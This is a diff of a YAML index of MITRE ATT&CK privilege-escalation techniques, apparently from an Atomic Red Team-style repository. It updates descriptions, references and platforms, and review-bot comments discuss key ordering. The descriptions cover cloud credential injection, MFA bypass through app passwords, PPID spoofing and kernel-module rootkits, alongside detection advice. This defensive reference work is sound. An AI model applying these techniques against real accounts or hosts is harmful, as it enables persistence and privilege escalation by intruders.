the environment.\n\nFor example, adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials
- in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
- Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
- both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
- With sufficient permissions, there are a variety of ways to add credentials
- including the Azure Portal, Azure command line interface, and Azure or Az
- PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+ in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+ Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+ include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+ Guidance) With sufficient permissions, there are a variety of ways to add
+ credentials including the Azure Portal, Azure command line interface, and
+ Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
may generate or import their own SSH keys using either the CreateKeyPair
@@ -19732,11 +20027,15 @@ privilege-escalation:
usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command
- in GCP to add access keys to an account. If the target account has different
- permissions from the requesting account, the adversary may also be able to
- escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+ in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
+ API in AWS to add a password that can be used to log into the AWS Management
+ Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+ Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+ If the target account has different permissions from the requesting account,
+ the adversary may also be able to escalate their privileges in the environment
+ (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
- 2.0) For example, in Azure AD environments, an adversary with the Application
+ 2.0) For example, in Entra ID environments, an adversary with the Application
Administrator role can add a new set of credentials to their application's
service principal. In doing so the adversary would be able to access the service
principal’s roles and permissions, which may be different from those of the
@@ -19747,12 +20046,19 @@ privilege-escalation:
tied to the permissions of the original user account. These temporary credentials
may remain valid for the duration of their lifetime even if the original account’s
API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
- Persistence)"
+ Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+ adversaries may be able to add an app password to a user account.(Citation:
+ Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+ legacy devices that do not support multi-factor authentication (MFA), adding
+ an app password can allow an adversary to bypass MFA requirements. Additionally,
+ app passwords may remain valid even if the user’s primary password is reset.(Citation:
+ Microsoft Entra ID App Passwords)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Expel
- Oleg Kolesnikov, Securonix
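Review bot: `x_mitre_attack_spec_version: 3.2.0` is inserted here, directly after `kill_chain_phases`, while a later hunk in the same T1098.001 object removes the identical key from the end of the object; the same applies to `x_mitre_modified_by_ref`. That is a key-ordering change rather than a content change, and it makes the diff hard to review. Consider having the generator emit object keys in a stable (for example sorted) order so that future regenerations only show real content changes.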
@@ -19761,6 +20067,7 @@ privilege-escalation:
- Alex Soler, AttackIQ
- Dylan Silva, AWS Security
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -19769,13 +20076,16 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- - Azure AD
- SaaS
- x_mitre_version: '2.7'
+ - Identity Provider
+ x_mitre_version: '2.8'
x_mitre_data_sources:
- 'User Account: User Account Modification'
+ - 'Active Directory: Active Directory Object Creation'
+ - 'Active Directory: Active Directory Object Modification'
type: attack-pattern
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
created: '2020-01-19T16:10:15.008Z'
@@ -19801,10 +20111,18 @@ privilege-escalation:
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+ - source_name: Lacework AI Resource Hijacking 2024
+ description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+ June 6). Lacework Labs. Retrieved July 1, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
- source_name: GCP SSH Key Add
description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
October 1, 2020.
url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
- source_name: Blue Cloud of Death Video
description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
Azure. Retrieved November 21, 2019.'
@@ -19813,10 +20131,20 @@ privilege-escalation:
description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
Azure. Retrieved October 23, 2019.'
url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+ - source_name: Microsoft Entra ID App Passwords
+ description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+ authentication with legacy applications using app passwords. Retrieved May
+ 28, 2024.
+ url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+ - source_name: Mandiant APT42 Operations 2024
+ description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+ Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+ Retrieved May 28, 2024.'
+ url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- source_name: Expel Behind the Scenes
description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -19833,9 +20161,6 @@ privilege-escalation:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.001
atomic_tests: []
T1134.003:
@@ -19899,7 +20224,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.003:
technique:
@@ -19988,7 +20312,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.003
atomic_tests: []
T1134.004:
@@ -20046,7 +20369,7 @@ privilege-escalation:
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe
rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe
), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-03T02:15:42.360Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Access Token Manipulation: Parent PID Spoofing'
x_mitre_detection: |-
@@ -20071,12 +20394,11 @@ privilege-escalation:
- Host Forensic Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.004
atomic_tests: []
T1546.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:27:11.065Z'
name: 'Event Triggered Execution: Change Default File Association'
description: "Adversaries may establish persistence by executing malicious content
triggered by a file type association. When a file is opened, the default program
@@ -20102,7 +20424,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
@@ -20116,7 +20437,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -20143,8 +20463,8 @@ privilege-escalation:
url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
- source_name: Microsoft File Handlers
description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
- Retrieved November 13, 2014.
- url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+ Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
- source_name: Microsoft Assoc Oct 2017
description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
7, 2018.
@@ -20155,7 +20475,8 @@ privilege-escalation:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.001
atomic_tests: []
T1055.014:
@@ -20226,7 +20547,7 @@ privilege-escalation:
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-07T17:09:09.048Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: VDSO Hijacking
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -20253,7 +20574,6 @@ privilege-escalation:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.014:
technique:
@@ -20293,7 +20613,7 @@ privilege-escalation:
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients
, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist
.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T00:16:01.732Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Emond'
x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -20313,12 +20633,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.014
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -20372,11 +20691,10 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547.001:
technique:
- modified: '2023-10-16T09:08:22.319Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
description: |-
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -20463,9 +20781,9 @@ privilege-escalation:
in the Registry. Retrieved August 3, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Oddvar Moe RunOnceEx Mar 2018
description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
from Autoruns.exe. Retrieved June 29, 2018.
@@ -20478,12 +20796,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.001
atomic_tests: []
T1098:
technique:
- modified: '2024-01-16T22:24:38.234Z'
+ modified: '2024-10-15T15:35:57.382Z'
name: Account Manipulation
description: "Adversaries may manipulate accounts to maintain and/or elevate
access to victim systems. Account manipulation may consist of any action that
@@ -20519,16 +20836,15 @@ privilege-escalation:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- SaaS
- Network
- Containers
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
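Review bot: `x_mitre_platforms` for T1098 drops `Azure AD`, `Office 365` and `Google Workspace` in favour of `Office Suite` and `Identity Provider` (T1098.001 earlier in this file makes the same `Azure AD` to `Identity Provider` swap). If any per-platform index is keyed on the old platform names, those indexes will silently lose these techniques; please confirm the platform-to-index mapping in the generator was updated to recognise the new names, or document that the old platform indexes are intentionally no longer populated for these techniques.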
@@ -20569,7 +20885,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098
atomic_tests:
- name: GCP - Delete Service Account Key
@@ -20648,138 +20963,137 @@ privilege-escalation:
terraform apply -auto-approve
T1547.006:
technique:
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-12T17:30:54.170Z'
+ name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+ description: |-
+ Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
+
+ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+ Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+ Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+ Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
- Anastasios Pingios
- Jeremy Galloway
- Red Canary
- Eric Kaiser @ideologysec
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: |
+ Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+
+ On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'File: File Creation'
+ - 'File: File Modification'
+ - 'Kernel: Kernel Module Load'
+ - 'Process: Process Creation'
+ x_mitre_permissions_required:
+ - root
type: attack-pattern
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
created: '2020-01-24T17:42:23.339Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1547.006
url: https://attack.mitre.org/techniques/T1547/006
+ external_id: T1547.006
- source_name: Apple Developer Configuration Profile
- url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
September 23, 2021.
+ url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
- source_name: Apple Kernel Extension Deprecation
- url: https://developer.apple.com/support/kernel-extensions/
description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
Alternatives. Retrieved November 4, 2020.
+ url: https://developer.apple.com/support/kernel-extensions/
- source_name: System and kernel extensions in macOS
- url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
March 31, 2022.
+ url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
- source_name: GitHub Reptile
- url: https://github.com/f0rb1dd3n/Reptile
description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
April 9, 2018.
+ url: https://github.com/f0rb1dd3n/Reptile
- source_name: Volatility Phalanx2
- url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+ url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
- source_name: iDefense Rootkit Overview
- url: http://www.megasecurity.org/papers/Rootkits.pdf
description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
- April 6, 2018.
+ September 12, 2024.
+ url: https://www.megasecurity.org/papers/Rootkits.pdf
- source_name: Linux Loadable Kernel Module Insert and Remove LKMs
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
+ url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
- source_name: CrowdStrike Linux Rootkit
- url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
+ url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: GitHub Diamorphine
- url: https://github.com/m0nad/Diamorphine
description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+ url: https://github.com/m0nad/Diamorphine
- source_name: Securelist Ventir
- url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
+ url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
- source_name: User Approved Kernel Extension Pike’s
- url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
Loading…. Retrieved September 23, 2021.
+ url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
- source_name: Linux Kernel Module Programming Guide
- url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
Retrieved April 6, 2018.
+ url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
- source_name: Linux Kernel Programming
- url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
+ url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: Trend Micro Skidmap
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
Retrieved June 4, 2020.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
- source_name: Purves Kextpocalypse 2
- url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
. Retrieved September 23, 2021.
+ url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
- source_name: RSAC 2015 San Francisco Patrick Wardle
- url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
Retrieved April 6, 2018.
+ url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Synack Secure Kernel Extension Broken
- url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
Extension Loading’ is Broken. Retrieved April 6, 2018.
+ url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
- source_name: Wikipedia Loadable Kernel Module
- url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
April 9, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
-
- When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
- Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
- Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
- Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
- x_mitre_detection: |
- Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
